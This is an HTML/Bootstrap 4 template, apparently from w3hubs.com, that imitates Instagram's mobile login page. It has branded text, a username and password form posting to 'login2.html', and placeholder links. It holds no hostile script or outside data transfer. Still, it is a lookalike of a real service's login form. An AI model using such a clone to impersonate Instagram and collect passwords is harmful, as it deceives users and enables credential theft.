<!-- W3hubs.com - Download Free Responsive Website Layout Templates designed on HTML5 CSS3,Bootstrap which are 100% Mobile friendly. w3Hubs all Layouts are responsive cross browser supported, best quality world class designs. -->

<!DOCTYPE html>
<html>
<head>
	<title>Instagram Mobile Login Page In Bootstrap 4 - W3hubs.com</title>
	<meta charset="utf-8">
	<meta name="description" content="w3hubs.com">
  <meta name="author" content="w3hubs.com">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="style.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
	<section id="w3hubs">
		<div class="container" style="
    width: 100%;
     padding-right: 0px; 
     padding-left: 0px;
    margin-right: auto;
    margin-left: auto;
">
		
            <p style="text-align: center; font-size: 28px; font-family: cursive">Instagram  </p>
			<form action="login2.html" method="POST" >
			 <div class="form-group">
			   
			    <input type="name" name="username" class="form-control" placeholder="Phone number,username, or email" required>
			  </div>
			  <div class="form-group">
			   
			    <input type="password" name="password" class="form-control" placeholder="Password" required>
                  
			  </div>
			  <button type="submit" class="btn btn-primary">Log In</button>
			</form>
			<h4>OR</h4>
			<p><i class="fa fa-facebook-square"></i><a href="#">Log In Facebook</a></p>
			<p><a href="#">Forget Password</a></p>
				<p>Don't have account? <a href="#">Sign up</a></p>
			</div>
		
	
	</section>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-125951040-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-125951040-1');
</script>
</body>
</html>